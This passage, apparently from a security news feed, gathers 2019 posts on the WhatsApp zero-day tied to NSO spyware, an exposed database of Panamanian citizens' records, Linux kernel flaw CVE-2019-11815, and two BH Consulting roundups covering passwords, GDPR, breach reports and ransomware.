Now The Financial Times described a scaring scenario in which attackers were able to exploit the WhatsApp zero-day vulnerability by just making a call to the target device via WhatsApp. The exploitation of the vulnerability doesn’t require the victim’s interaction. In fact, the victim does not need to answer for the vulnerability to be exploited, and it seems that after the attack there is no trace on the device of the malicious incoming calls.

The Financial Times cites the case of an unnamed attorney based in the United Kingdom that was targeted on May 12. The lawyer is involved in a lawsuit filed against NSO by individuals that were targeted with the surveillance software of the company.

“The attack has all the hallmarks of a private company reportedly that works with governments to deliver spyware that takes over the functions of mobile phone operating systems,” reads a briefing document note for journalists cited by BBC and other media outlets.

Of course, the NSO Group denied any support to government agencies that could have targeted the UK lawyer with its surveillance software.

“NSO would not, or could not, use its technology in its own right to target any person or organization, including this individual,” states NSO group.

Pierluigi Paganini

(SecurityAffairs – WhatsApp Zero-day, Hacking)

The post WhatsApp zero-day exploited in targeted attacks to deliver NSO spyware appeared first on Security Affairs.

Security roundup: May 2019

We round up interesting research and reporting about security and privacy from around the web. This month: password practice, GDPR birthday, c-suite risk, and further reading for security pros.

Passwords: a good day to try hard

No self-respecting security pro would use easy passwords, but could they say the same for their colleagues (i.e. everyone else)? The answer is no, according to the UK National Cyber Security Centre. It released a list of the 100,000 most hacked passwords, as found in Troy Hunt’s ‘Have I Been Pwned’ data set of breached accounts. Unsurprisingly, ‘123456’ topped the list. A massive 23 million accounts use this flimsy string as “protection” (in the loosest possible sense of the word). Next on the list of shame was the almost as unimaginative ‘123456789’, ‘qwerty’, ‘password’ and 1111111.

The NCSC released the list for two reasons: firstly to prompt people to choose better passwords. Secondly, to allow sysadmins to set up blacklists to block people in their organisations from choosing any of these terrible passwords for themselves. The list is available as a .txt file here and the agency blogged about the findings to give more context. Help Net Security has a good summary of the study. The NCSC published the research in the buildup to World Password Day on May 2, which Euro Security Watch said should be every day.

WP Engine recently performed its own analysis of 10 million compromised passwords, including some belonging to prominent (and anonymised) victims. It makes a useful companion piece to the NCSC study by looking at people’s reasons for choosing certain passwords.

Encouraging better security behaviour through knowledge is one part of the job; effective security controls are another. In April, Microsoft said it will stop forcing password resets for Windows 10 and Windows Server because forcing resets doesn’t improve security. CNet’s report of this development noted Microsoft’s unique position of influence, given its software powers almost 80 per cent of the world’s computers. We recently blogged about what the new FIDO2 authentication standard could mean for passwords. Better to use two-factor authentication where possible. Google’s Mark Risher has explained that 2FA offers much more effective protection against risks like phishing.

GDPRversary getting closer

Almost one year on from when the General Data Protection Regulation came into force, we’re still getting to grips with its implications. The European Data Protection Supervisor, Giovanni Buttarelli, has weighed in on the state of GDPR adoption. He covered many areas in an interview with Digiday, including consent, fines, and legitimate interest. One comment we liked was how falling into line with the regulation is an ongoing activity, not a one-time target to hit. “Compliance is a continued working progress for everyone,” he said.

The European Data Protection Board (formerly known as the Article 29 Working Group) recently issued draft guidance on an appropriate legal basis and contractual obligations in the context of providing online services to data subjects. This is a public consultation period that runs until May 24.

The EDPB is also reportedly planning to publish accreditation requirements this summer. As yet, there are no approved GDPR certification schemes or accreditation bodies, but that looks set to change. The UK regulator recently published its own information about certification and codes of conduct.

Meanwhile, Ireland’s Data Protection Commission has started a podcast called Know Your Data. The short episodes have content that mixes information for data controllers and processors, and more general information for data subjects (ie, everyone).

Breaching the c-suite

Senior management are in attackers’ crosshairs as never before, and 12 times more likely to be targeted in social engineering incidents than in years past. That is one of the many highlights from the 2019 Verizon Data Breach Investigations Report. Almost seven out of ten attacks were by outsiders, while just over a third involved internal parties. Just over half of security breaches featured hacking; social engineering was a tactic in 33 per cent of cases. Errors were the cause of 21 per cent of breaches, while 15 per cent were attributed to misuse by authorised users.

Financial intent was behind 12 per cent of all the listed data breaches, and corporate espionage was another motive. As a result, there is a “critical” need for organisations to make all employees aware of the potential threat of cybercrime, Computer Weekly said. ThreatPost reported that executives are six times more likely to be a target of social engineering than a year ago.

Some sites like ZDNet led with another finding: that nation-state attackers are responsible for a rising proportion of breaches (23 per cent, up from 12 per cent a year ago). It also highlighted the role of system admin issues that subsequently led to breaches in cloud storage platforms. Careless mistakes like misconfiguration and publishing errors also left data at risk of access by cybercriminals.

The Verizon DBIR is one of the most authoritative sources of security information. Its content is punchy, backed by a mine of informative stats to help technology professionals and business leaders plan their security strategies. The analysis derives from 41,000 reported cybersecurity incidents and 2,000 data breaches, featuring contributions from 73 public and private organisations across the globe, including Ireland’s Irisscert. The full report and executive summary are free to download here.

Links we liked

Challenge your preconceptions: a new paper argues cybersecurity isn’t important. MORE

An unfortunate trend that needs to change: security pros think users are stupid. MORE

It’s time to panic about privacy, argues the New York Times in this interactive piece. MORE

Want a career in cybersecurity, or know someone who does? Free training material here. MORE

NIST has developed a comprehensive new tool for finding flaws in high-risk software. MORE

NIST also issued guidelines for vetting the security of mobile applications. MORE

Cybersecurity threats: perception versus reality as reported by AT&T Security. MORE

Here’s a technical deep dive into how phishing kits are evolving, courtesy of ZScaler. MORE

A P2P flaw exposes millions of IoT security cameras and other devices to risks. MORE

A new way to improve network security by analysing compressed traffic. MORE

 

The post Security roundup: May 2019 appeared first on BH Consulting.

Unprotected DB exposed PII belonging to nearly 90% of Panama citizens

Personally identifiable information belonging to roughly 90% of Panama citizens were exposed on a poorly configured Elasticsearch server.

Security researcher Bob Diachenko discovered an unprotected Elasticsearch server exposing personally identifiable information belonging to nearly 90% of Panama citizens.

Exposed data includes full names, birth dates, national ID numbers, medical insurance numbers, and other personal data.

The database contained 3.4 million records related to Panamanian citizens, labeled as “patients,” and 468,086 records labeled as “test-patient.”

“On May 10th I identified a massive bulk of data sitting in an unprotected and publicly available Elasticsearch cluster (hence visible in any browser).” reads the blog post published by Diachenko.

“This database contained 3,427,396 records with detailed information on Panamanian citizens (labeled as ‘patients‘), plus 468,086 records with records labeled as ‘test-patient‘ (although, this data also appeared to be valid and not purely test data).”

Panama Citizens data leak

The expert reported his discovery to CERT Panama, and within 48 hours the database has been secured.

At this time, it is unclear who was running the poorly secured server, anyway the exposed information appears to be authentic.

Querying the Shodan search engine service, the researcher discovered that the IP address associated with the unprotected server has been indexed since April 24th, 2019. Of course, it is impossible to determine if anyone else has accessed the data.

“The danger of having an exposed Elasticsearch or similar NoSql databases is huge.” concludes Diachenko. “I have previously reported that the lack of authentication allowed the installation of malware or ransomware on the MongoDB servers. The public configuration allows the possibility of cybercriminals to manage the whole system with full administrative privileges.” “Once the malware is in place criminals could remotely access the server resources and even launch a code execution to steal or completely destroy any saved data the server contains.”

Pierluigi Paganini

(SecurityAffairs – Panama, data leak)

The post Unprotected DB exposed PII belonging to nearly 90% of Panama citizens appeared first on Security Affairs.

CVE-2019-11815 Remote Code Execution affects Linux Kernel prior to 5.0.8

Security experts have found a race condition vulnerability (CVE-2019-11815) in Linux Kernel Prior to 5.0.8 that expose systems to remote code execution.

Linux systems based on kernel versions prior to 5.0.8 are affected by a race condition vulnerability leading to a use after free that could be exploited by hackers to get remote code execution.

Attackers can trigger the race condition issue that resides in the rds_tcp_kill_sock TCP/IP implementation in net/rds/tcp.c to cause a denial-of-service (DoS) condition and to execute code remotely on vulnerable Linux machines.

The vulnerability could be exploited by sending specially crafted TCP packets to vulnerable Linux systems.

The vulnerability tracked as CVE-2019-11815 received a CVSS v3.0 base score of 8.1, it could be abused by unauthenticated attackers without user interaction.

Anyway, the NIST assigned to the vulnerability an exploitability score of 2.2 and an impact score of 5.9 because it is difficult to exploit.

“An issue was discovered in rds_tcp_kill_sock in net/rds/tcp.c in the Linux kernel before 5.0.8. There is a race condition leading to a use-after-free, related to net namespace cleanup.” reads the description provided by Mitre.

The exploitation of the flaw could allow attackers to access resources, modify any files, and deny access to resources.

CVE-2019-11815 linux flaw

The development team of Linux kernel already released a security patch that addressed the CVE-2019-11815 flaw at the end of March. The vulnerability was completely fixed with the release of Linux kernel 5.0.8 version.

Below the security advisories published by the major Linux distributions:

Pierluigi Paganini

(SecurityAffairs – CVE-2019-11815, Linux Kernel)

The post CVE-2019-11815 Remote Code Execution affects Linux Kernel prior to 5.0.8 appeared first on Security Affairs.

Security roundup: March 2019

We round up interesting research and reporting about security and privacy from around the web. This month: ransomware repercussions, reporting cybercrime, vulnerability volume, everyone’s noticing privacy, and feeling GDPR’s impact.

Ransom vs ruin

Hypothetical question: how long would your business hold out before paying to make a ransomware infection go away? For Apex Human Capital Management, a US payroll software company with hundreds of customers, it was less than three days. Apex confirmed the incident, but didn’t say how much it paid or reveal which strain of ransomware was involved.

Interestingly, the story suggests that the decision to pay was a consensus between the company and two external security firms. This could be because the ransomware also encrypted data at Apex’s newly minted external disaster recovery site. Most security experts strongly advise against paying extortionists to remove ransomware. With that in mind, here’s our guide to preventing ransomware. We also recommend visiting NoMoreRansom.org, which has information about infections and free decryption tools.

Bonus extra salutary security lesson: while we’re on the subject of backup failure, a “catastrophic” attack wiped the primary and backup systems of the secure email provider VFE Systems. Effectively, the lack of backup put the company out of business. As Brian Honan noted in the SANS newsletter, this case shows the impact of badly designed disaster recovery procedures.

Ready to report

If you’ve had a genuine security incident – neat segue alert! – you’ll probably need to report it to someone. That entity might be your local CERT (computer emergency response team), to a regulator, or even law enforcement. (It’s called cybercrime for a reason, after all). Security researcher Bart Blaze has developed a template for reporting a cybercrime incident which you might find useful. It’s free to download at Peerlyst (sign-in required).

By definition, a security incident will involve someone deliberately or accidentally taking advantage of a gap in an organisation’s defences. Help Net Security recently carried an op-ed arguing that it’s worth accepting that your network will be infiltrated or compromised. The key to recovering faster involves a shift in mindset and strategy from focusing on prevention to resilience. You can read the piece here. At BH Consulting, we’re big believers in the concept of resilience in security. We’ve blogged about it several times over the past year, including posts like this.

In incident response and in many aspects of security, communication will play a key role. So another helpful resource is this primer on communicating security subjects with non-experts, courtesy of SANS’ Lenny Zeltser. It takes a “plain English” approach to the subject and includes other links to help security professionals improve their messaging. Similarly, this post from Raconteur looks at language as the key to improving collaboration between a CISO and the board.

Old flaws in not-so-new bottles

More than 80 per cent of enterprise IT systems have at least one flaw listed on the Common Vulnerabilities and Exposures (CVE) list. One in five systems have more than ten such unpatched vulnerabilities. Those are some of the headline findings in the 2019 Vulnerability Statistics Report from Irish security company Edgescan.

Edgescan concluded that the average window of exposure for critical web application vulnerabilities is 69 days. Per the report, an average enterprise takes around 69 days to patch a critical vulnerability in its applications and 65 days to patch the same in its infrastructure layers. High-risk and medium-risk vulnerabilities in enterprise applications take up to 83 days and 74 days respectively to patch.

SC Magazine’s take was that many of the problems in the report come from companies lacking full visibility of all their IT assets. The full Edgescan report has even more data and conclusions and is free to download here.

From a shrug to a shun

Privacy practitioners take note: consumer attitudes to security breaches appear to be shifting at last. PCI Pal, a payment security company, found that 62 per cent of Americans and 44 per cent of Britons claim they will stop spending with a brand for several months following a hack or breach. The reputational hit from a security incident could be greater than the cost of repair. In a related story, security journalist Zack Whittaker has taken issue with the hollow promise of websites everywhere. You know the one: “We take your privacy seriously.”

If you notice this notice…

Notifications of data breaches have increased since GDPR came into force. The European Commission has revealed that companies made more than 41,000 data breach notifications in the six-month period since May 25. Individuals or organisations made more than 95,000 complaints, mostly relating to telemarketing, promotional emails and video surveillance. Help Net Security has a good writeup of the findings here.

It was a similar story in Ireland, where the Data Protection Commission saw a 70 per cent increase in reported valid data security breaches, and a 56 per cent increase in public complaints compared to 2017. The summary data is here and the full 104-page report is free to download.

Meanwhile, Brave, the privacy-focused browser developer, argues that GDPR doesn’t make doing business harder for a small company. “In fact, if purpose limitation is enforced, GDPR levels the playing field versus large digital players,” said chief policy officer Johnny Ryan.

Interesting footnote: a US insurance company, Coalition, has begun offering GDPR-specific coverage. Dark Reading’s quotes a lawyer who said insurance might be effective for risk transference but it’s untested. Much will depend on the policy’s wording, the lawyer said.

Things we liked

Lisa Forte’s excellent post draws parallels between online radicalisation and cybercrime. MORE

Want to do some malware analysis? Here’s how to set up a Windows VM for it. MORE

You give apps personal information. Then they tell Facebook (PAYWALL). MORE

Ever wondered how cybercriminals turn their digital gains into cold, hard cash? MORE

This 190-second video explains cybercrime to a layperson without using computers. MORE

Blaming the user for security failings is a dereliction of responsibility, argues Ira Winkler. MORE

Tips for improving cyber risk management. MORE

Here’s what happens when you set up an IoT camera as a honeypot. MORE

The post Security roundup: March 2019 appeared first on BH Consulting.